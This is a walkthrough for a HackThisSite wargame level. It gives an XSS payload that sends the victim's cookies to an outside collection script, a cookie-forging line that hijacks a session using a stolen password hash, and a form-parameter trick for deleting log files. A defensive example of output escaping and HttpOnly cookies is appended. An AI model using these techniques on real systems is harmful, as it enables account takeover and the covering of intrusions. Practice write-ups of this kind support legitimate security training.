Here is the JavaScript code for HTS Level 9:
1. Code to take a look at the cookie:
javascript:alert(document.cookie);
2. The XSS exploit, inserted into the message to Mr. Crap:
</textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script>
3. The code to use the stolen cookie data:
javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1";
Now you can move the money!!
4. Deleting the session data.
Log out and go to the main page of Crappy Soft. Go to the mailing list form.
Now you need a Firefox extension like UrlParams or a proxy with a freeze function. Alternatively, you can manipulate the POST data with a faked HTTP header. To see how to fake an HTTP header with PHP, take a look at this page:
http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html
But it is written in German. The fastest way is the UrlParams extension for Firefox.
You must change the value of strFilename: strFilename="/files/logs/logs.txt". Now you must enter a valid email address with an @ and a dot.
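The flaw behind steps 2 and 3, seen from the server side, as an added example that is not code from this post or from the challenge site: an unencoded message lets markup close the textarea early, and credentials kept in script-readable cookies can then be read by that markup. The function names, the `sid` cookie name and the sample message are assumptions made for the illustration.

```javascript
// Added example. All names here (renderMessageUnsafe, renderMessageSafe,
// sessionCookieHeader, sid) are hypothetical, not taken from the challenge site.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can end a text context or start a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the stored message is concatenated into the page as-is.
function renderMessageUnsafe(message) {
  return '<textarea name="message">' + message + '</textarea>';
}

// Hardened form: the message is encoded before it reaches the markup.
function renderMessageSafe(message) {
  return '<textarea name="message">' + escapeHtml(message) + '</textarea>';
}

// Count <script> tags that end up outside any textarea element,
// i.e. tags the browser would treat as real script elements.
function scriptTagsOutsideTextarea(html) {
  const withoutTextareas = html.replace(/<textarea\b[^>]*>[\s\S]*?<\/textarea>/gi, '');
  return (withoutTextareas.match(/<script\b/gi) || []).length;
}

// Session cookie as an opaque server-side token instead of username + password hash.
// HttpOnly keeps it out of document.cookie; Secure and SameSite limit where it is sent.
function sessionCookieHeader(sessionId) {
  if (!/^[A-Za-z0-9_-]{32,}$/.test(sessionId)) {
    throw new Error('session id must be an opaque random token');
  }
  return `sid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Constructed sample input: closes the textarea early, then opens a script tag.
const sampleMessage = '</textarea><script>alert(1)</script>';

console.log('unsafe:', scriptTagsOutsideTextarea(renderMessageUnsafe(sampleMessage)));
console.log('safe:  ', scriptTagsOutsideTextarea(renderMessageSafe(sampleMessage)));
console.log(sessionCookieHeader('A'.repeat(32))); // constructed token, not a real session id
```
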